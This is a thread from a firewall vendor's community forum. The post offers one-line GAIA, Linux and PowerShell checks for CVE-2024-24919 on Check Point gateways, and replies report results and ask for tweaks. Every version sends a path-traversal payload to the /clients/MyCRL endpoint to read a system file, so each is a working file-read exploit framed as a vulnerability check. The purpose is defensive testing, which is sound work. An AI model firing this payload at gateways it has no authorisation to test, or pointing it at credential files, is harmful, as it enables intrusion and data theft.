Create a Post
cancel
Showing results for 
Search instead for 
Did you mean: 
HeikoAnkenbrand
Champion Champion
Champion

ONELINER - Check CVE-2024-24919 Vulnerability

Run this onliner to check if your Check Point Gateway is vulnerable to CVE-2024-24919 (sk182336).
GAIA gateways and SMB gateways are supported.

1)  Depending on where you want to run the Onliner, you can copy and paste the code for GAIA, Linux or Powershell.
     Copy the code into the CLI. 

1a) GAIA version for expert mode:

 

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl_cli --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

 

1b) Linux version (all other linux distributions):

 

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

 

1c) Windows Powershell version:

 

clear;$C="";$O="";[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};Add-Type -AssemblyName Microsoft.VisualBasic;$IP_addr = [Microsoft.VisualBasic.Interaction]::InputBox("This is a test tool to check if your Check Point Gateway is vulnerable to CVE-2024-24919.`r`n`r`n`r`nDestination IP:", "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", "");try{$C=(Invoke-WebRequest -Uri "https://${ip_addr}/clients/MyCRL" -Method POST -Body "aCSHELL/../../../../../../../etc/cp-release" -TimeoutSec 5 )} catch [System.Net.WebException] { if([int]$_.Exception.Response.StatusCode -eq 404) {$O="`r`nNo vulnerability could be detected!`r`n" } else {$O="`r`nGateway is not reachable!`r`n"} };  if ($C.StatusCode -match "200") {$O="`r`nNo vulnerability could be detected!`r`n"; if ($C.content -match "Check Point")  {$O="`r`nAttention! `r`nThis system is vulnerable to CVE-2024-24919. More read here sk182336.`r`n"}};Add-Type -AssemblyName System.Windows.Forms; $result = [System.Windows.Forms.MessageBox]::Show($O, "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::None)

 

2) Now enter the IP address of the gateway to be checked.

GAIA/Linux:
cve_33_5345345.jpg

Powershell:
PS_TT_5345345345.jpg

If the following message appears, your system is vulnerable:

Attention!
The system is vulnerable to CVE-2024-24919.
More read here sk182336.

If the following message appears, your system is not vulnerable:

No vulnerability could be detected!

If no output appears, the system is not be reachable.

---

Version:
1.5          06/02/2024                                                     Powershell interactive version with windows
1.4          06/01/2024                                                     Powershell version with correct status codes
1.3          06/01/2024                                                     Linux and Powershell version provided
1.2          05/30/2024                                                     error with SMB applications fixed
1.1          05/29/2024                                                     fixed error with output
1.0          05/28/2024                                                     first version                            

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips
(4)
19 Replies
natascha
Explorer

Very helpful tool.
We have checked about 40 gateways and found a few without a hotfix in our company.

Thanks @HeikoAnkenbrand 

renzi
Participant

Nice

0 Kudos
the_rock
Legend
Legend

Fantastic as always!

0 Kudos
dceko
Explorer

Hi,

Can you modify script to check only for HTTP Response code after "| sed", because i think every gateway that respond with response code that is not 404 - File Not Found is vulnerable? This way this check can be used for small boxes, not managed by management server.

0 Kudos
HeikoAnkenbrand
Champion Champion
Champion

I have adapted the code so that it should now also work with SMB applications.

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips
0 Kudos
HeikoAnkenbrand
Champion Champion
Champion

the_rock
Legend
Legend

I just ran it on my Azure fw and it did not display anything...weird, though I do have vpn enabled, as well as remote access too. I may need to read up on all this again, as I came back from vacation, so its possible this is not even related to original issue with local vpn users/remote access. Never mind, read it afterwards, it is related, but will look into it more Monday.

Andy

CVE-2024-24919 check tool by Heiko Ankenbrand 2024


Destination IP: 52.229.98.249
[Expert@azurefw:0]#

0 Kudos
Moudar
Advisor

When running it on my gateway expert mode i get this:

Destination IP: 10.10.11.11
<!DOCTYPE html><HTML><HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE9,EmulateIE8"><meta name="others" content="WEBUI LOGIN PAGE"  /><TITLE>GAiA</TITLE>
<link rel="shortcut icon" href="/login/fav.ico">
<link rel="stylesheet" type="text/css" href="/login/ext-all.css" />
<link rel="stylesheet" type="text/css" href="/login/login.css" />
<STYLE TYPE="text/css">
.ext-ie .webui-login-fld{font-size: 11px;}
</STYLE>
<script type="text/javascript" src="/login/ext-base.js"></script><script type="text/javascript" src="/login/ext-all.js"></script><script type="text/javascript">var errMsgText = "";var bannerMsgText = "";bannerMsgText += "This%20system%20is%20for%20authorized%20use%20only.%0A";var hostname='fw01';var version='R81.20';var formAction="/cgi-bin/home.tcl";</script><script type="text/javascript" src="/login/login.js"></script></HEAD><BODY><noscript><div style='font-size:20px;position:relative;top:100px;'>For full functionality of this site it is necessary to enable JavaScript.</div></noscript></BODY></HTML>

  

the_rock
Legend
Legend

R81.20?

0 Kudos
HeikoAnkenbrand
Champion Champion
Champion

Hi @Moudar 

This is the HTML code of the gateway login screen.
I have modified the onliner so that this will no longer be shown in the future.

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips
genisis__
Leader Leader
Leader

Is there a oneliner we can run on the gateway itself and how does this work in VSX?

0 Kudos
HeikoAnkenbrand
Champion Champion
Champion

I think that should work in VS0.

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips
0 Kudos
genisis__
Leader Leader
Leader

thanks Heiko

0 Kudos
HeikoAnkenbrand
Champion Champion
Champion

Version 1.5 works as an interactive version with windows:
PS_TT_5345345345.jpg

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips
the_rock
Legend
Legend

AWESOME!

0 Kudos
EitschStwoN
Explorer

Hi Heiko,

Thanks for this script, it is really a shame that Checkpoint did not provide this themselves or at least refer to this article in the mitigation guide.

Looks like the problem has been around for a long time and its strange that this has never been seen in a CODE review.
Usually you trust a firewall not to have such rookie bugs.


Markus

GHOST
Participant

👍

0 Kudos
HeikoAnkenbrand
Champion Champion
Champion

@EitschStwoN 

I think they don't want to publish the exploit code in the forum.
And from my point of view, that's a good thing.

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips
the_rock
Legend
Legend

Totally agree.

0 Kudos

Leaderboard

Epsum factorial non deposit quid pro quo hic escorol.

Upcoming Events

    CheckMates Events